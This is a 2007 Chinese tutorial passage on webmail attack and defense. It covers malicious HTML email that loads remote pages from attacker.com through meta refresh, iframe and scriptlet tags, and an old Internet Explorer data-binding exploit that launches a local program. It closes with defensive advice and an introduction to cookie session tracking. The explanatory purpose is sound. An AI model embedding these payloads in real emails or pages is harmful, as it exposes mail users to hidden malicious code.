Webmail攻防实战(5)
来源:云南设计港 发布时间:2007-10-30 14:05:00
除了可以在html邮件中直接嵌入脚本程序外,攻击者还可以设计一些html代码,在用户打开html邮件时,不知不觉引入另一个html文件,而此文件中正含有恶性代码,这样不仅能直接绕过WebMail系统对脚本程序的过滤,而且还能有效避开提供了防毒服务的邮件系统对恶性代码的查杀。下面是几个调用html文件的例子:
(1)Refresh到另一个页面:
<body>
<metahttp-equiv="refresh"content="1;URL=http://www.attacker.com/another.htm">
</body>
(2)Iframe引入另一个页面:
<body>
<iframesrc="http://www.attacker.com/import.htm"frameborder="0"></iframe>
</body>
(3)scriptlet引入另一个页面:
<body>
<objecttype="text/x-scriptlet"data="http://www.attacker.com/import.htm"></object>
</body>
攻击者还可以采取如下方法,使带有恶性代码的html邮件具有更大的隐蔽性:
(1)配合邮件欺骗技术,使用户不会怀疑收到的邮件,并且攻击者也能隐藏自己的行踪。
(2)把html邮件设计成看起来像txt邮件。
(3)有时可以把html邮件中的恶性代码放在一个隐藏的层里面,表面上看不出任何变化。
针对恶性脚本程序的影响,对用户常见的建议办法是提高浏览器的安全级别,如禁用ActiveX、禁用脚本等,但这并不是一个很好的办法,因为这样会影响到用户对其他正常html页面的浏览。即使浏览器达到了最高级别,依然对某些恶性代码无济于事,下面是位以色列安全专家发现的漏洞,能让Windows系统自动执行任何本地程序,即使InternetExplorer已经禁止了ActiveX和脚本程序:
<spandatasrc="#oExec"datafld="exploit"dataformatas="html"></span>
<xmlid="oExec">
<security>
<exploit>
<![CDATA[
<objectid="oFile"classid="clsid:11111111-1111-1111-1111-
111111111111"codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
面对恶性html邮件,WebMail系统和用户似乎都没有很好的解决办法,虽然许多WebMail系统已经能够过滤掉html邮件中的很多恶性代码,不过令人遗憾的是,要想彻底过滤掉恶性代码并不是一件容易的事情,攻击者总能利用WebMail系统过滤机制和浏览器的漏洞找到办法绕过种种过滤,WebMail系统所能做的就是发现一个漏洞补一个漏洞。
为了减少乃至避免恶性html邮件的影响,在打开html邮件之前,WebMail系统有必要提醒用户这是一个html邮件,如果能提供让用户以文本方式浏览html邮件的功能,则是最好不过。在打开不明邮件之前,用户更要小心谨慎,最好把html邮件“目标另存为”到本地硬盘上再打开来看,如果能先查看html邮件源代码,则是最好不过。
另外需要特别提醒用户注意的是,虽然一些电子邮件系统会在WebMail系统上对html邮件中的恶性代码进行过滤,但在pop3服务器上并不会进行过滤,所以,如果是通过邮件客户端收取邮件,仍然要谨防恶性html邮件的危害。
五、Cookie会话攻击
当用户以自已的邮箱帐户和密码登录进WebMail以后,如果再让用户对每一步操作都输入密码加以确认就会让人不甚其烦。所以WebMail系统有必要进行用户会话跟踪,WebMail系统用到的会话跟踪技术主要有两种:cookie会话跟踪和URL会话跟踪。
Cookie是web服务器保存在用户浏览器上的文本信息,可以包含用户名、特殊ID、访问次数等任何信息,通常此信息用于标识访问同一web服务器上的不同用户,在浏览器每次访问同一web服务器时会发送过去,用于跟踪特定客户端或浏览器与web服务器进行交互的状态。
Cookie的类型有两种:持久型和临时型。持久型cookie以文本形式存储在硬盘上,由浏览器存取。使用了持久型cookie会话跟踪的WebMail系统有hotmail、yahoo电邮(可选)等。临时型cookie也称为会话cookie,存储在内存中,仅为当前浏览器的对话存储,关闭当前浏览器后会立即消失,ASP、PHP4等开发程序中用到的session对象就会产生临时型cookie。使用了临时型cookie会话跟踪的WebMail系统有FM365、亿邮等。
猜你喜欢
- 11月5日消息,网络电话服务商Skype的诉讼纷扰可能要告一段落了,美国《纽约时报(NewYorkTimes)》报道引述几位知情人士透露,这
- 11月5日上午消息,开心网CEO程炳皓近日首次接受台湾媒体《商业周刊》专访时表示,开心网团队已从最初的6人增加到80人,一个月广告收入平均达
- 读完本篇文章大家有必要看一下自己的友情链接,是不是已经被nofollow了。也许有些朋友问,什么是nofollow?简单的讲,就是虽然你的友
- 代理共享上网和控制 * 权限,界面友好,设置简单,功能强大。支持Modem代理/ADSL代理/宽带代理/Cable Modem代理等方式共
- 目前,就我所知道的对于301重定向的方法,有两个:1.利用apache支持的.htaccess进行改写,实现重定向2.利用程序进行域名的30
- 本文描述了如何在Windows XP中通过配置TCP/IP协议的方式使用域名服务(DNS)。DNS是一种用以将域名转换为IP地址的Inter
- 为什么我的Free Ad-Supported托管网站不能正常显示呢? 如果你的HTML代码使用的是绝对位置,你的网站将显示在广告幅的右边或者
- 当前,国内社交网站(SNS)的发展呈现多元化趋势,搜狐、新浪、盛大、腾讯等都在进入社交领域。现对大部分用户来说,到各种网站上建立自己的好友关
- <script src="{dede:field name='phpurl'
- 如今在IT工业中,虚拟技术的发展已经蓄势待发,但在Linux集群中却难以成功。Beowulf工程的创始人之一Donald Becker说,这
- 当大多数同龄人还在靠周末辛苦打工赚一点零用钱时,16岁的英国小企业家乔纳森·格鲁宾已通过他所建立的3家网站掘出第一桶金,仅去年就赚了7.5万
- 服务器不仅仅是企业网络设备的中枢,也是企业软件及数据库应用的主体。在实际运行中服务器经常会出现这样或那样的故障,软件的或者硬件的。很多故障是
- 使用下面的步骤来设置ftp进行日志记录:1.# cp /etc/inetd.conf /etc/inetd.conf.bak2.# vi /
- 域名选择域名是网站的基础,是人们进入互联网时对其相应网站的第一印象,一个好的域名对于网站的意义是不言而喻的,商业网站选择域名与主机尤其应注重
- 饭否网初听这个名字,让我想起一句成语:廉颇老矣,尚能饭否?私下里不由窃窃:王兴取的这个饭否网,究竟蕴藏着什么玄机,与廉颇老前辈有什么渊源吗?
- 想知道自己的电脑在运行什么,那些东西是否经过你的认可了?这个时候你要进入CMD,用命令netstat -an,查看自己电脑与外界有哪些联系,
- 什么是具有生命力的网站?这我要先说一下什么是网站的生命力,我觉得生命力是源动力,是促使网站更好发展的根本。具体到表现形式,就是如何更好的吸引
- IXWebHosting怎么样?自从IXWebHosting中文网站上线以后就有人不断的发邮件问我这个问题,但是要简单的回复这个问题却不容易
- 一、 前言随着各大网站纷纷推出邮箱收费服务,广大网民正在逐渐适应 "有偿服务"的概念,与此同时,他们也对收费邮箱的服务质
- 1、经常规律性的更新文章2、确保服务器工作正常3、使页面尽量简洁,确保打开速度快4、检查内部链接结构,去除死链接和重复链接5、尽量多从正规和